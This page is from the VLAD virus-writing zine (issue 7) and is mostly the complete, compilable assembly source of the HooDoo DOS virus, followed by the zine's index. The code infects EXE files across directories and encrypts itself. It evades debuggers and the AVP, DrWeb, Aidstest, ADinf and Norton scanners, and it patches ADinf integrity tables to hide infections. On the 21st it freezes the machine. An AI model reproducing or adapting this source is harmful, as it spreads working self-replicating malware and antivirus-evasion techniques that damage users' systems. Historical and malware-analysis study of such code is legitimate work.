Virus Labs & Distribution
VLAD #7 - HooDoo Virus


;****************************************************************************
; Virus name    : HOODOO V1.0
; Author        : Infiltrator (FATAL BREAKPOINT BBS)
; Origin        : St-Petersburg, RUSSIA, January 1, 1996
; Compiling     : TASM HOODOO.ASM
;                 TLINK /T HOODOO.OBJ
;---------------------------------------------------------------------------
; Targets       : EXE files from current dir to root
; Size          : 2609 bytes
; Polymorphic   : No
; Encryption    : Yes
; Stealth       : No
; Tunneling     : Yes
; Retro         : Yes
; Antiheuristics: Yes
;****************************************************************************


;===================== Macros used for direct int calls=================
int_21h Macro
        pushf
        cli
        call dword ptr [real_int21][si]
        Endm

;-------------------------------------------------------------------
int_13h Macro
        pushf
        cli
        call dword ptr [real_int13][si]
        Endm
;--------------------------------------------------------------------
        Attributs       EQU     15h
        File_time       EQU     16h
        File_date       EQU     18h
        File_size       EQU     1Ah
        File_name       EQU     1Eh
;--------------------------------------------------------------------
;AAM - used to fool some lame analysers
al_to_ah	Macro
		db 0D4h,1
		EndM
;--------------------------------------------------------------------
.model tiny
.code
.startup
.286

virus_start:

	db	3Eh,0FCh			;fooling code
	
	push ax bx cx dx si di bp ds 		;saving all registers!
	push es

        mov ax,cs
        mov ds,ax
        mov es,ax

;Performing old trick
        call old_trick

old_trick:
	db	26h,0FCh	; fool code

	mov bp,sp
	mov si,ss:[bp]
	inc sp
	inc sp
        sub si,offset old_trick
	
	lea ax,code_decode[si]
	mov dx,cs
	xor cx,cx
	mov es,cx

	xchg ax,word ptr es:[0]
	xchg dx,word ptr es:[2]
	mov word ptr old_int0[si],ax
	mov word ptr old_int0[si+2],dx

	div cx	;performing a divide by ZERO to call code_decode (en/decryption)

;---------------------------[ coded part ]-----------------------------
code_start:
	mov ax,cs
	mov es,ax

	push si
	xchg bp,si

        lea si,real_jump[bp]
        lea di,current_jump[bp]
        movsw
        movsw                                   ;restoring last jump

	pop si

	xor ax,ax
	push ax
	pop cx
	dec sp
	dec sp
	pop bx

	cmp cx,bx
	jz not_tracing

	mov byte ptr td_present[si],255

not_tracing:	
;---------------------------------------------------------------------
Get_DOS_version:
        mov ax,3001h
        int 21h
        cmp al,5
        jae check_8086
        jmp bad_environment

check_8086:
        mov byte ptr avp_TSR_present[si],0

;--------------------------------------------------------------------
;Check if 8086
        push sp
        pop ax
        cmp ax,sp
        jz _286
        jmp bad_environment

_286:
;--------------------------------------------------------------------
;Check avp TSR
	call check_avp_TSR
;--------------------------------------------------------------------
;check for 386+

        mov ax,7000h
        pushf
        push ax
        popf
        pushf
        pop ax
        popf
        and ax,7000h         ; check for flag 
        jz short _80286     ; if ax=0 then this is a 80286

;--------------------------------------------------------------------
;Check OS/2
        mov ax,4010h
        int 2Fh
        cmp ax,4010h
	jz No_OS2
        jmp bad_environment

No_OS2:
;--------------------------------------------------------------------
_80286:
;Find DOS segment

        mov ah,34h
        int 21h                 ;DOS activity flag

        mov word ptr [real_int21+2][si],es          ;store DOS seg

        mov ax,3501h
        int 21h

        mov word ptr [old_int1][si],bx
        mov word ptr [old_int1+2][si],es            ;saving old int1

	mov ah,25h
        lea dx,trace_handler[si]
        int 21h                                 ;setting int1 handler

        mov search_DOS[si],0
	mov trace_report[si],0
        xor ax,ax
        mov es,ax

        pushf
        pop ax
        or ah,1                 ; turn on trap flag
        push ax
        in al,21h                  ; Get old IMR
        mov IMR[si],al
        mov al,0FFh                 ; disable all interrupts
        out 21h,al
        popf

        mov dl,80h              	;Drive C:
        mov ah,9        	        ;reset HD controller
        pushf
        call dword ptr es:[13h*4]              ;simulate int 13h

        pushf
        pop ax
        or ah,1		           ;Set TF for 2-nd tracing
        push ax
        popf

        mov search_DOS[si],1
        xor ax,ax
        mov es,ax
        mov ax,3001h				;Get DOS version
        pushf
        call dword ptr es:[21h*4]            ;Simulate int 21h

        pushf
        pop ax
        and ax,0FEFFh           ;clear TF
        push ax
        popf

        mov al,IMR[si]           ; reenable interrupts
        out 21h,al

	test trace_report[si],1
	jnz traced_13
	jmp bad_environment

traced_13:
;------------------------------------------------------------------------
;Check avp TSR presence
        cmp byte ptr avp_TSR_present[si],0
        jz avp_not_present

        call time_has_come

avp_not_present:        
;------------------------------------------------------------------------
;test bit 1 of TD_presence
        test byte ptr td_present[si],1
        jz td_not_present

	call time_has_come

td_not_present:
;------------------------------------------------------------------------
	db	36h,0FBh	;fooling code

        mov ah,4
        int 1Ah         ;Get date

        cmp dl,21h        ;day 21?
        jnz not_yet

        call time_has_come

not_yet:

;-----------------------------------------------------------------------

	test trace_report[si],2
	jnz traced_21
	jmp bad_environment
	
;-----------------------------------------------------------------------
;setting vector 13 to BIOS
;-----------------------------------------------------------------------
traced_21:
	db 26h, 0F8h		;fooling code
	
	xor ax,ax
	mov es,ax			;additionnal warranty

        push word ptr es:[13h*4]
        push word ptr es:[13h*4+2]      ;old vector 13

        push word ptr [real_int13][si]
        push word ptr [real_int13+2][si]    ;real vector 13

        cli
        pop word ptr es:[13h*4+2]
        pop word ptr es:[13h*4]         ;Critical !
        sti

        pop word ptr [real_int13+2][si]
        pop word ptr [real_int13][si]

;------------------------------------------------------------------
; restoring int1
;------------------------------------------------------------------

        push word ptr [old_int1][si]
        push word ptr [old_int1+2][si]

        cli
        pop word ptr es:[1*4+2]
        pop word ptr es:[1*4]
        sti

;get current default drive
        mov ah,19h
        int 21h
        cmp al,2		;don't infect floppies
	jnc get_free_disk_space
	jmp bad_environment

get_free_disk_space:
        mov ah,36h
        xor dl,dl
        int 21h
        cmp ax,0FFFFh
	jnz check_for_20k
        jmp bad_environment

check_for_20k:
        mul cx
        mul bx

        or dx,dx
        jnz enough_disk_space

        cmp ax,20*1024          ;check if there are 20 kb free!
	jnc enough_disk_space
	jmp bad_environment

enough_disk_space:
;---------------------------------------------------------------
;Get initial dir
	xchg si,bp		;store SI value!

	mov ah,47h
	xor dl,dl
	lea si,initial_dir[bp+1]
	int 21h			

	xchg si,bp
;-----------------------------------------------------------------
;Get old DTA address into ES:BX
	mov ah,2Fh
	int 21h
	mov word ptr [old_DTA][si],bx
	mov word ptr [old_DTA+2][si],es
;-----------------------------------------------------------------
;Set new DTA
	mov ah,1Ah
	lea dx,DTA[si]
	int 21h

;=================== Searching and infecting ====================

	in al,21h
	mov IMR[si],al
	or al,2		;masking kb interrupts
	out 21h,al

	mov bingo[si],0

Find_first_EXE:

	mov ah,4Eh

        lea dx,exe_mask[si]
        int_21h

        cmp al,12h
        jz no_more_exe_files

        call infect_file

Find_next_EXE:

	mov ah,4Fh

	lea dx,exe_mask[si]
        int_21h
        cmp al,12h
        jz no_more_exe_files

        call infect_file

        jmp short Find_next_EXE

no_more_exe_files:
;--------------------------------------------------------------
;Change to upper dir
        mov ah,3Bh
        lea dx,upper_dir[si]
        int_21h
        jnc Find_first_EXE
;---------------------------------------------------------------
;Guess what
        cmp bingo[si],0
        jz no_need_adinf
	call kill_adinf

no_need_adinf:

;======================== Infections achieved! =================

;Returning to initial dir
	mov ah,3Bh
	lea dx,initial_dir[si]
	int_21h

	mov al,IMR[si]
	out 21h,al		;re-enabling kb interrupts
;Restoring Old DTA 
	push ds

        mov dx,word ptr old_DTA[si]	;offset
        mov ax,word ptr old_DTA[si+2]	;seg
	mov ds,ax

	mov ah,1Ah
        int 21h

	pop ds 
;-----------------------------------------------------------------
; restore int13
;-----------------------------------------------------------------

	xor ax,ax
	mov es,ax			;additional warranty

        push word ptr es:[13h*4]
        push word ptr es:[13h*4+2]      ;real vector 13

        push word ptr [real_int13][si]
        push word ptr [real_int13+2][si]    ;old vector 13

        cli
        pop word ptr es:[13h*4+2]
        pop word ptr es:[13h*4]         ;Critical!
        sti

        pop word ptr [real_int13+2][si]
        pop word ptr [real_int13][si]
;----------------------------------------------------------------------
;restore int 0
;----------------------------------------------------------------------

	mov ax,word ptr old_int0[si]
	mov dx,word ptr old_int0[si+2]
	
	xchg ax,es:[0]	
	xchg dx,es:[2]	

;--------------------------------------------------------------------

bad_environment:
        pop es
        mov ax,es                    ;AX = PSP segment
        add ax,10h                   ;Adjust for PSP
        add word ptr [current_jump+2][si],ax

        jmp $+2

;	mov ah,9
;	lea dx,msg[si]
;	int 21h
	
	pop ds bp di si dx cx bx ax	;restoring all registers!

        db      0EAh
current_jump    dd      0
real_jump       dw      offset virus_end,0-10h

initial_dir	db	'\',64 dup(0)
upper_dir	db	'..',0
exe_mask	db	'*.exe',0
header          db      18h dup(0)               ;exe-header
bingo		db	0			;=1 when infection has occured
						;and need to patch adinf
adinf_path      db      '*.*',0
ad_table        db      13 dup(0)
buffer		db	512 dup(0)		;needed to read adinf table
old_DTA		dd	0	
DTA		db	128 dup(0)
real_int13      dd      0
search_DOS      db      0
old_int1        dd      0
trace_report	db	0
IMR             db      0
msg		db	13,10,7,7,"HOODOO V1.0 (c)1995 by Infiltrator. "
		db	"Please register.$"
;Need to fuck avp
antiviral_msg   db      20h,0Dh,0Ah,'Antiviral$'
antimsg_len     equ     $-antiviral_msg

;Need to fuck avp TSR
avp_TSR_present	db	0		

;=======================[ TRACE HANDLER ]================================

trace_handler:

        push bp ax cx es si

        mov bp,sp

        cmp search_DOS[si],1
        je skip_13

        mov ax,ss:[bp+12]                 ;CS
        cmp ax,0C000h
        jb exit_trace

        mov ax,ss:[bp+10]                   ;IP
        mov cl,4
        shr ax,cl
        add ax,ss:[bp+12]
        jc exit_trace           ;0FFFFh seg overflow

        mov ax,ss:[bp+10]
        mov word ptr ds:[real_int13][si],ax
        mov ax,ss:[bp+12]
        mov word ptr ds:[real_int13+2][si],ax

	or trace_report[si],1	;mark as found
        jmp short found_13

skip_13:
        mov ax,ss:[bp+12]                   ;DOS CS
        cmp ax,word ptr ds:[real_int21+2][si]
        jnz exit_trace

        mov ax,ss:[bp+10]
        mov word ptr ds:[real_int21][si],ax    ;DOS IP
	or trace_report[si],2		;mark as found

found_13:
        mov ax,ss:[bp+14]
        and ax,0FEFFh           ;clear TF in stack
        mov ss:[bp+14],ax

exit_trace:

        pop si es cx ax bp
        iret
;====================[ Infecting file ]==================================
infect_file	proc

;Preparing encrypting value
retry_value:
	mov ah,0
	int 1Ah
	or dl,dl
	jz retry_value
	mov encrypt_value[si],dl

	mov ax,4301h
	xor cx,cx
	lea dx,[DTA+File_name][si]
	int 21h			;clear attributs

	mov al,3Dh
	al_to_ah
	mov al,02h		
;	mov ax,3D02h
        lea dx,[DTA+File_name][si]
        int_21h
        xchg bx,ax


	mov al,3Fh
	al_to_ah
;	mov ah,3Fh
        mov cx,18h      ;read header
        lea dx,header[si]
        int_21h

;Check for 0E9h

        cmp byte ptr ds:[header+si],0E9h	;misnamed COM
	jnz check_for_EB
        jmp close_file

check_for_EB:
        cmp byte ptr ds:[header+si],0EBh	;misnamed COM
	jnz check_4_MZ
        jmp close_file

Check_4_MZ:
        cmp word ptr ds:[header+si],'ZM'	;Real EXE file?
	jz check_4_size
        jmp close_file

check_4_size:
	cmp word ptr [DTA+file_size+2][si],0
	jnz size_ok

	cmp word ptr [DTA+file_size][si],20*1024	;20kb
	jnc size_ok
	jmp close_file

size_ok:
        mov ax,4200h
        mov cx,word ptr [DTA+File_size+2][si]
        mov dx,word ptr [DTA+File_size][si]
        dec dx                  ;point to last word in file
	dec dx
        int_21h

;Check if already infected
        mov ah,3Fh
        mov cx,2		;read 2 bytes
        lea dx,ID_word[si]
        int_21h

	mov ax,ID_word[si]
	cmp ax,word ptr [DTA+16h][si]

        jnz not_infected
	jmp close_file


not_infected:
;----------------------------------------------------------------------
;Check if it's aidstest

	mov ax,4200h
	xor cx,cx
	mov dx,131		;offset in aidstest.exe
	int 21h

	mov ah,3Fh
	mov cx,23		;read bytes
	lea dx,buffer[si]
	int 21h

        cmp byte ptr buffer[si],''
        jz other_smile
        jmp not_aidstest

other_smile:
        cmp byte ptr buffer[si+22],''
        jnz not_aidstest
        jmp close_file

not_aidstest:
;----------------------------------------------------------------------
;Check if it's web

	mov ax,4200h
	xor cx,cx
	mov dx,29h		;offset in drweb.exe
	int 21h

	mov ah,3Fh
	mov cx,4		;read bytes
	lea dx,buffer[si]
	int 21h

	mov al,''

	cmp byte ptr buffer[si],al
	jz other_face
	jmp not_web

other_face:
	cmp byte ptr buffer[si+3],al
	jnz not_web
	jmp close_file

not_web:
;----------------------------------------------------------------------
;Check if it's adinf
	
	mov ax,4200h
	xor cx,cx
	mov dx,29h		;offset in adinf.exe
	int 21h

	mov ah,3Fh
	mov cx,8		;read bytes
	lea dx,buffer[si]
	int 21h

	mov al,''

	cmp byte ptr buffer[si],al
	jz second_face
	jmp not_adinf

second_face:
	cmp byte ptr buffer[si+7],al
	jnz not_adinf
	jmp close_file

not_adinf:
;----------------------------------------------------------------
;Check if Norton Antivirus 2.0

	mov ax,4200h
	xor cx,cx
	mov dx,32h		;offset in nav.exe
	int 21h

	mov ah,3Fh
	mov cx,8
	lea dx,buffer[si]
	int 21h

;check for 'Sy' (Symantec)
        cmp word ptr buffer[si],7953h
	jz check_ec
	jmp not_nav20

;check for 'ec'
check_ec:
	cmp word ptr buffer[si+6],6365h
	jnz not_nav20
        jmp close_file

not_nav20:
;-------------------------------------------------------------------
;Checking for overlay and infecting

	mov al,42h
	al_to_ah
	mov al,02h
;	mov ax,4202h
        cwd
        xor cx,cx
        int_21h         ;EOF

        push bx
        push ax
        push dx

        call convert_size_to_pages

        cmp dx,word ptr [header+4][si]
        jz ovl1

	pop dx	
	pop ax
	pop bx			;handle
	jmp close_file
ovl1:
        cmp ax,word ptr [header+2][si]            ;checking for overlay
        jz ovl2
	
	pop dx
	pop ax
	pop bx			;handle
	jmp close_file
ovl2:

	pop dx
	pop ax
	push ax
	push dx
	
        mov cx,word ptr [header+14h][si]
        mov word ptr [real_jump][si],cx         ;IP
        mov cx,word ptr [header+16h][si]
        mov word ptr [real_jump+2][si],cx               ;CS

        mov bx,word ptr [header+8][si]
        mov cl,4
        shl bx,cl

        sub ax,bx
        sbb dx,0                ;sub header from file size

        mov cx,10h
        div cx                  ;convert to seg:offset

        mov word ptr [header+14h][si],dx        ;New entry point
        mov word ptr [header+16h][si],ax

        mov word ptr [header+0Eh][si],ax        ;new stack segment

	mov ah, byte ptr [DTA+File_date][si]	;ah=high byte of date (year)
	mov al, byte ptr [DTA+File_size][si]	;al=low byte of file size
        mov word ptr [header+10h][si],ax	;New SP

        pop dx
        pop ax

        add ax,virus_end-virus_start
        adc dx,0

        call convert_size_to_pages

        mov word ptr [header+4][si],dx          ;new file size
        mov word ptr [header+2][si],ax

        add word ptr [header+0Ah][si],virus_end-virus_start
        jnc $+8
        mov word ptr [header+0Ah][si],0FFFFh            ;min alloc

        add word ptr [header+0Ch][si],virus_end-virus_start
        jnc $+8

        mov word ptr [header+0Ch][si],0FFFFh            ;max alloc



;NEED to correct ID word HERE!
	mov ax,word ptr [DTA+16h][si]
	mov word ptr ID_word[si],ax


        pop bx                  ;restore handle


	mov al,40h
	al_to_ah
;        mov ah,40h
        mov cx,virus_end-virus_start
        lea dx,virus_start[si]

code_mid1:

;	call code_decode		;encrypting virus to be linked
	div al

        int_21h                 ;append virus to file

	xor ax,ax
	div al
;	call code_decode		;de-crypting virus

code_mid2:

	mov bingo[si],1

        mov ax,4200h
        cwd
        xor cx,cx
        int_21h

	mov al,40h
	al_to_ah
;        mov ah,40h
        mov cx,18h
        lea dx,header[si]	;write new header to file
        int_21h

;Need to restore time and date
	mov al,57h
	al_to_ah
	mov al,1
;	mov ax,5701h
	mov cx,word ptr [DTA+16h][si]	;original time
	mov dx,word ptr [DTA+18h][si]	;original date
	int_21h

Close_file:

	mov al,3Eh
	al_to_ah
;        mov ah,3Eh
        int_21h				;close file

;Need to restore attributs

	mov al,43h
	al_to_ah
	mov al,1
;	mov ax,4301h
	mov cx,word ptr [DTA+15h][si]	;original attributs
	lea dx,word ptr [DTA+1Eh][si]	;file name
	int_21h

	retn

infect_file	endp

;======================[ Time has come ]===============================

time_has_come           proc

	in al,21h
	mov IMR[si],al
	or al,2
	out 21h,al		;mask KB interrupts

	lea dx,msg[si]
	mov ah,9
	int 21h

        jmp $           ;lock !

time_has_come   endp

;=============================[ Check avp TSR]===============================
check_avp_TSR	proc
	pusha

        mov ax,0Ah
        mov es,ax

	xchg bp,si		;store SI

        mov di,452h
        lea si,antiviral_msg[bp]
        mov cx,antimsg_len
repnz   movsb			;storing 'Antiviral' at 452h

	xchg si,bp		;restore SI

        mov ah,46h
        mov bx,1
        mov cx,1
        int 21h         ;redirect CON to NUL

        push ds
        mov ax,0Ah
        mov ds,ax
        mov ah,9
        mov dx,452h
        mov cx,2D64h		;check if avp is installed
        int 21h
        pop ds

        push cx
        mov ah,46h
        mov bx,0
        mov cx,1
        int 21h         ;restoring CON
        pop cx

        cmp cx,736Dh
        jnz no_avp

	mov byte ptr avp_TSR_present[si],1

no_avp:

        mov ax,0Ah
        mov es,ax

        mov di,452h
        mov cx,antimsg_len
repnz   stosb                   ;restoring '0' at 452h

	popa
	ret
check_avp_TSR	endp

;=======================[ Converting size to pages ]==========================
convert_size_to_pages   proc

        push ax
        mov cl,7
        shl dx,cl
        and ax,0FE00h
        mov cl,9
        shr ax,cl
        add dx,ax
        pop ax
        and ax,1FFh
        jz $+3
        inc dx
        retn

convert_size_to_pages   endp

;==========================[ Kill adinf ]===============================
Kill_adinf	proc
	pusha

	mov ax,cs
	mov es,ax

	mov ah,4Eh			;Find first

;	mov al,4Eh
;	al_to_ah

	mov cx,2			;find all hidden files!
	lea dx,adinf_path[si]
	int_21h
	cmp al,12h
	jz patch_done
	call patch_adinf

next_table:
	mov ah,4Fh
;	mov al,4Fh
;	al_to_ah

	mov cx,2
	lea dx,adinf_path[si]
	int_21h	
	cmp al,12h
	jz patch_done
	call patch_adinf

	jmp short next_table

patch_done:
	popa
        ret

Kill_adinf	endp

;===========================[ Patch adinf ]===============================

patch_adinf     proc

        lea bx,[DTA+1Eh][si]		;file name in DTA
        lea di,ad_table[si]

next_letter:

        mov al,[bx]
        inc bx
        stosb
        or al,al
        jnz next_letter

        mov ax,4301h
;	mov al,43h
;	al_to_ah
;	mov al,1

        xor cx,cx
        lea dx,ad_table[si]
        int_21h

        mov ax,3D02h
;	mov al,3Dh
;	al_to_ah
;	mov al,02h

        lea dx,ad_table[si]
        int_21h
        xchg ax,bx

        mov ax,4200h
;	mov al,42h
;	al_to_ah
;	mov al,0

        xor cx,cx
        mov dx,68h              ;point at 'Advanced Diskinfoscope...'
        int_21h

        mov ah,3Fh
;	mov al,3Fh
;	al_to_ah

        mov cx,70h
        lea dx,buffer[si]
        int_21h

        cmp word ptr [buffer+si],'dA'
        jnz fake_adinf

        cmp word ptr [buffer+49h][si],''
        jnz fake_adinf

        mov ax,4200h
;	mov al,42h
;	al_to_ah
;	mov al,0

        xor cx,cx
        mov dx,200h
        int_21h

        mov ah,40h
        mov buffer[si],0
        lea dx,buffer[si]
        mov cx,1                ;1 byte patch!
        int_21h

fake_adinf:

        mov ax,5701h                    ;restoring
;	mov al,57h
;	al_to_ah
;	mov al,1


        mov cx,word ptr ds:[DTA+16h][si]    ;file time
        mov dx,word ptr ds:[DTA+18h][si]    ;file date
        int_21h

        mov ah,3Eh
;	mov al,3Eh
;	al_to_ah

        int_21h

        mov ax,4301h
;	mov al,43h
;	al_to_ah
;	mov al,1

        mov cl,byte ptr ds:[DTA+15h][si]
        xor ch,ch
        lea dx,ad_table[si]
        int_21h                 ;restore attributs

        retn

patch_adinf     endp

;========================[ Mark end of encryption ]=====================
code_end:
;=========================[ Encoding/decoding ]=========================
code_decode	proc

	push ax bx cx di es bp

	mov bp,sp
	add word ptr ss:[bp+12],2	;coz it still points to 'div cx'

	push cs
	pop es

	lea bx,code_start[si]
	mov di,bx
	mov cx,code_mid1-code_start

        call crypt_cycle                ;crypt/decrypting 1-st half

        lea bx,code_mid2[si]
        mov di,bx
        mov cx,code_end-code_mid2

        call crypt_cycle                ;crypt/decrypting 2-nd half

        pop bp es di cx bx ax
	retf 2

code_decode	endp

;==========================[ Encrypting cycle ]=========================

crypt_cycle	proc

do_crypt:

        mov al,[bx]
        xor al,encrypt_value[si]
        stosb
        inc bx

;Test turbo debugger presence inside loop
        push cs
        pop ss
        pushf
        pop ax
        mov byte ptr td_present[si],ah          ;Trap bit stored.

        loop do_crypt
	retn

crypt_cycle	endp
;=========================[Various values]=================================
;Placed here to avoid encryption!

real_int21      dd      0
old_int0	dd	0

;Need to fuck turbo debugger
td_present	db	0

;=========================[ Encrypt value ]==============================

encrypt_value	db	0

;========================[ ID BYTE ]=====================================

ID_word         dw      0

;=======================[ Part to be cutted off ]========================
virus_end:
        db      0B8h,0,4Ch
        db      0CDh,21h
;========================================================================
end
- VLAD #7 INDEX -

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

No Flags
ARTICLE.2_2       Goodbye Virus
ARTICLE.2_3       Boot Sector Tutorial
ARTICLE.2_4       STAOG Linux Virus
ARTICLE.2_5       Pow Boot Virus
ARTICLE.2_6       Wulf2
ARTICLE.2_7       Tbscan Internals

ARTICLE.3_1      

VLAD Viruses
ARTICLE.3_2       TVIR600
ARTICLE.3_3       Vecna Boot Virus
ARTICLE.3_4       Padania Virus
ARTICLE.3_5       HooDoo Virus
ARTICLE.3_6       Pandemonium Virus
ARTICLE.3_7       Black Lotus

ARTICLE.4_1      

Zip Virus
ARTICLE.4_2       Archive Infect
ARTICLE.4_3       Virstop Article
ARTICLE.4_4       Boza Makes Bontchev Barf Virus
ARTICLE.4_5       Killer Virus
ARTICLE.4_6       Muraroa End
ARTICLE.4_7       Mages Fury

About VLAD - Links - Contact Us - Main